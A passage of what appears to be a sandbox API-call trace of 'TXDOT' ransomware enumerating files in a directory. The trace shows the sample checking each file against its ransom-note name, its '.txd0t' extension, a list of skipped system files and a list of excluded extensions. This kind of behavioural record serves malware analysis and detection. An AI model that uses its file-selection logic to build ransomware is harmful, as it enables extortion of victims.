lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.756] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.756] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.756] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.756] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.756] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x143bc400, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0x143bc400, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x143bc400, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x23420, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0071.756] StrCmpW (psz1="sqmapi.dll", psz2=".") returned 1 [0071.756] StrCmpW (psz1="sqmapi.dll", psz2="..") returned 1 [0071.756] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.756] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.756] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="sqmapi.dll", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\sqmapi.dll") returned="C:\\588bce7c90097ed212\\sqmapi.dll" [0071.756] PathFindExtensionW (pszPath="sqmapi.dll") returned=".dll" [0071.756] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.756] StrCmpIW (psz1="sqmapi.dll", psz2="bootsect.bak") returned 1 [0071.756] StrCmpIW (psz1="sqmapi.dll", psz2="iconcache.db") returned 1 [0071.757] StrCmpIW (psz1="sqmapi.dll", psz2="thumbs.db") returned -1 [0071.757] StrCmpIW (psz1="sqmapi.dll", psz2=" ransomware ") returned 1 [0071.757] StrCmpIW (psz1="sqmapi.dll", psz2=" ransom ") returned 1 [0071.757] StrCmpIW (psz1="sqmapi.dll", psz2="debug.txt") returned 1 [0071.757] StrCmpIW (psz1="sqmapi.dll", psz2="boot.ini") returned 1 [0071.757] StrCmpIW (psz1="sqmapi.dll", psz2="desktop.ini") returned 1 [0071.757] StrCmpIW (psz1="sqmapi.dll", psz2="autorun.inf") returned 1 [0071.757] StrCmpIW (psz1="sqmapi.dll", psz2="ntuser.dat") returned 1 [0071.757] StrCmpIW (psz1="sqmapi.dll", psz2="ntldr") returned 1 [0071.757] StrCmpIW (psz1="sqmapi.dll", psz2="ntdetect.com") returned 1 [0071.757] StrCmpIW (psz1="sqmapi.dll", psz2="bootfont.bin") returned 1 [0071.757] StrCmpIW (psz1="sqmapi.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.757] PathFindExtensionW (pszPath="sqmapi.dll") returned=".dll" [0071.757] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.757] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3704, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Strings.xml", cAlternateFileName="")) returned 1 [0071.757] StrCmpW (psz1="Strings.xml", psz2=".") returned 1 [0071.757] StrCmpW (psz1="Strings.xml", psz2="..") returned 1 [0071.757] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.757] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.757] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Strings.xml", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Strings.xml") returned="C:\\588bce7c90097ed212\\Strings.xml" [0071.757] PathFindExtensionW (pszPath="Strings.xml") returned=".xml" [0071.757] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.757] StrCmpIW (psz1="Strings.xml", psz2="bootsect.bak") returned 1 [0071.757] StrCmpIW (psz1="Strings.xml", psz2="iconcache.db") returned 1 [0071.757] StrCmpIW (psz1="Strings.xml", psz2="thumbs.db") returned -1 [0071.757] StrCmpIW (psz1="Strings.xml", psz2=" ransomware ") returned 1 [0071.757] StrCmpIW (psz1="Strings.xml", psz2=" ransom ") returned 1 [0071.757] StrCmpIW (psz1="Strings.xml", psz2="debug.txt") returned 1 [0071.757] StrCmpIW (psz1="Strings.xml", psz2="boot.ini") returned 1 [0071.757] StrCmpIW (psz1="Strings.xml", psz2="desktop.ini") returned 1 [0071.757] StrCmpIW (psz1="Strings.xml", psz2="autorun.inf") returned 1 [0071.757] StrCmpIW (psz1="Strings.xml", psz2="ntuser.dat") returned 1 [0071.757] StrCmpIW (psz1="Strings.xml", psz2="ntldr") returned 1 [0071.757] StrCmpIW (psz1="Strings.xml", psz2="ntdetect.com") returned 1 [0071.757] StrCmpIW (psz1="Strings.xml", psz2="bootfont.bin") returned 1 [0071.757] StrCmpIW (psz1="Strings.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.758] PathFindExtensionW (pszPath="Strings.xml") returned=".xml" [0071.758] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.758] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.758] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.758] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.758] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.758] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.758] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.758] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x97f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0071.758] StrCmpW (psz1="UiInfo.xml", psz2=".") returned 1 [0071.758] StrCmpW (psz1="UiInfo.xml", psz2="..") returned 1 [0071.758] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.758] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.758] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="UiInfo.xml", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\UiInfo.xml") returned="C:\\588bce7c90097ed212\\UiInfo.xml" [0071.758] PathFindExtensionW (pszPath="UiInfo.xml") returned=".xml" [0071.758] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.758] StrCmpIW (psz1="UiInfo.xml", psz2="bootsect.bak") returned 1 [0071.758] StrCmpIW (psz1="UiInfo.xml", psz2="iconcache.db") returned 1 [0071.758] StrCmpIW (psz1="UiInfo.xml", psz2="thumbs.db") returned 1 [0071.758] StrCmpIW (psz1="UiInfo.xml", psz2=" ransomware ") returned 1 [0071.758] StrCmpIW (psz1="UiInfo.xml", psz2=" ransom ") returned 1 [0071.758] StrCmpIW (psz1="UiInfo.xml", psz2="debug.txt") returned 1 [0071.758] StrCmpIW (psz1="UiInfo.xml", psz2="boot.ini") returned 1 [0071.758] StrCmpIW (psz1="UiInfo.xml", psz2="desktop.ini") returned 1 [0071.758] StrCmpIW (psz1="UiInfo.xml", psz2="autorun.inf") returned 1 [0071.758] StrCmpIW (psz1="UiInfo.xml", psz2="ntuser.dat") returned 1 [0071.758] StrCmpIW (psz1="UiInfo.xml", psz2="ntldr") returned 1 [0071.758] StrCmpIW (psz1="UiInfo.xml", psz2="ntdetect.com") returned 1 [0071.758] StrCmpIW (psz1="UiInfo.xml", psz2="bootfont.bin") returned 1 [0071.758] StrCmpIW (psz1="UiInfo.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.758] PathFindExtensionW (pszPath="UiInfo.xml") returned=".xml" [0071.758] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.759] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.759] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.759] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.759] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.759] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.759] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.759] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0x19688, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="watermark.bmp", cAlternateFileName="WATERM~1.BMP")) returned 1 [0071.759] StrCmpW (psz1="watermark.bmp", psz2=".") returned 1 [0071.759] StrCmpW (psz1="watermark.bmp", psz2="..") returned 1 [0071.759] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.759] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.759] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="watermark.bmp", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\watermark.bmp") returned="C:\\588bce7c90097ed212\\watermark.bmp" [0071.759] PathFindExtensionW (pszPath="watermark.bmp") returned=".bmp" [0071.759] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0071.759] StrCmpIW (psz1="watermark.bmp", psz2="bootsect.bak") returned 1 [0071.759] StrCmpIW (psz1="watermark.bmp", psz2="iconcache.db") returned 1 [0071.759] StrCmpIW (psz1="watermark.bmp", psz2="thumbs.db") returned 1 [0071.759] StrCmpIW (psz1="watermark.bmp", psz2=" ransomware ") returned 1 [0071.759] StrCmpIW (psz1="watermark.bmp", psz2=" ransom ") returned 1 [0071.759] StrCmpIW (psz1="watermark.bmp", psz2="debug.txt") returned 1 [0071.759] StrCmpIW (psz1="watermark.bmp", psz2="boot.ini") returned 1 [0071.759] StrCmpIW (psz1="watermark.bmp", psz2="desktop.ini") returned 1 [0071.759] StrCmpIW (psz1="watermark.bmp", psz2="autorun.inf") returned 1 [0071.759] StrCmpIW (psz1="watermark.bmp", psz2="ntuser.dat") returned 1 [0071.759] StrCmpIW (psz1="watermark.bmp", psz2="ntldr") returned 1 [0071.759] StrCmpIW (psz1="watermark.bmp", psz2="ntdetect.com") returned 1 [0071.759] StrCmpIW (psz1="watermark.bmp", psz2="bootfont.bin") returned 1 [0071.759] StrCmpIW (psz1="watermark.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.759] PathFindExtensionW (pszPath="watermark.bmp") returned=".bmp" [0071.759] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0071.759] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.759] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.759] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.760] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.760] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.760] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.760] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x2120bc00, ftLastWriteTime.dwHighDateTime=0x1cac6c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f5113, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.0-KB956250-v6001-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0071.760] StrCmpW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2=".") returned 1 [0071.760] StrCmpW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="..") returned 1 [0071.760] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.760] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.760] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Windows6.0-KB956250-v6001-x64.msu", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" [0071.760] PathFindExtensionW (pszPath="Windows6.0-KB956250-v6001-x64.msu") returned=".msu" [0071.760] StrCmpW (psz1=".msu", psz2=".txd0t") returned -1 [0071.760] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="bootsect.bak") returned 1 [0071.760] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="iconcache.db") returned 1 [0071.760] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="thumbs.db") returned 1 [0071.760] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2=" ransomware ") returned 1 [0071.760] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2=" ransom ") returned 1 [0071.760] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="debug.txt") returned 1 [0071.760] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="boot.ini") returned 1 [0071.760] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="desktop.ini") returned 1 [0071.760] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="autorun.inf") returned 1 [0071.760] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="ntuser.dat") returned 1 [0071.760] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="ntldr") returned 1 [0071.760] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="ntdetect.com") returned 1 [0071.760] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="bootfont.bin") returned 1 [0071.760] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.760] PathFindExtensionW (pszPath="Windows6.0-KB956250-v6001-x64.msu") returned=".msu" [0071.760] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msu") returned=".msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.760] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x1bbe7400, ftLastWriteTime.dwHighDateTime=0x1cac6bf, nFileSizeHigh=0x0, nFileSizeLow=0x217520, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.0-KB956250-v6001-x86.msu", cAlternateFileName="WINDOW~2.MSU")) returned 1 [0071.760] StrCmpW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2=".") returned 1 [0071.760] StrCmpW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="..") returned 1 [0071.760] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.760] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.760] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Windows6.0-KB956250-v6001-x86.msu", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" [0071.761] PathFindExtensionW (pszPath="Windows6.0-KB956250-v6001-x86.msu") returned=".msu" [0071.761] StrCmpW (psz1=".msu", psz2=".txd0t") returned -1 [0071.761] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="bootsect.bak") returned 1 [0071.761] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="iconcache.db") returned 1 [0071.761] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="thumbs.db") returned 1 [0071.761] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2=" ransomware ") returned 1 [0071.761] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2=" ransom ") returned 1 [0071.761] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="debug.txt") returned 1 [0071.761] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="boot.ini") returned 1 [0071.761] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="desktop.ini") returned 1 [0071.761] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="autorun.inf") returned 1 [0071.761] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="ntuser.dat") returned 1 [0071.761] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="ntldr") returned 1 [0071.761] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="ntdetect.com") returned 1 [0071.761] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="bootfont.bin") returned 1 [0071.761] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.761] PathFindExtensionW (pszPath="Windows6.0-KB956250-v6001-x86.msu") returned=".msu" [0071.761] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msu") returned=".msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.761] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x5b8e5700, ftLastWriteTime.dwHighDateTime=0x1cac6d1, nFileSizeHigh=0x0, nFileSizeLow=0x4db1ce, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.1-KB958488-v6001-x64.msu", cAlternateFileName="WINDOW~3.MSU")) returned 1 [0071.761] StrCmpW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2=".") returned 1 [0071.761] StrCmpW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="..") returned 1 [0071.761] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.761] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.761] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Windows6.1-KB958488-v6001-x64.msu", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" [0071.761] PathFindExtensionW (pszPath="Windows6.1-KB958488-v6001-x64.msu") returned=".msu" [0071.761] StrCmpW (psz1=".msu", psz2=".txd0t") returned -1 [0071.761] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="bootsect.bak") returned 1 [0071.761] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="iconcache.db") returned 1 [0071.761] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="thumbs.db") returned 1 [0071.761] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2=" ransomware ") returned 1 [0071.761] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2=" ransom ") returned 1 [0071.761] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="debug.txt") returned 1 [0071.761] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="boot.ini") returned 1 [0071.761] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="desktop.ini") returned 1 [0071.761] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="autorun.inf") returned 1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="ntuser.dat") returned 1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="ntldr") returned 1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="ntdetect.com") returned 1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="bootfont.bin") returned 1 [0071.762] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.762] PathFindExtensionW (pszPath="Windows6.1-KB958488-v6001-x64.msu") returned=".msu" [0071.762] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msu") returned=".msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.762] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 1 [0071.762] StrCmpW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2=".") returned 1 [0071.762] StrCmpW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="..") returned 1 [0071.762] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.762] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") 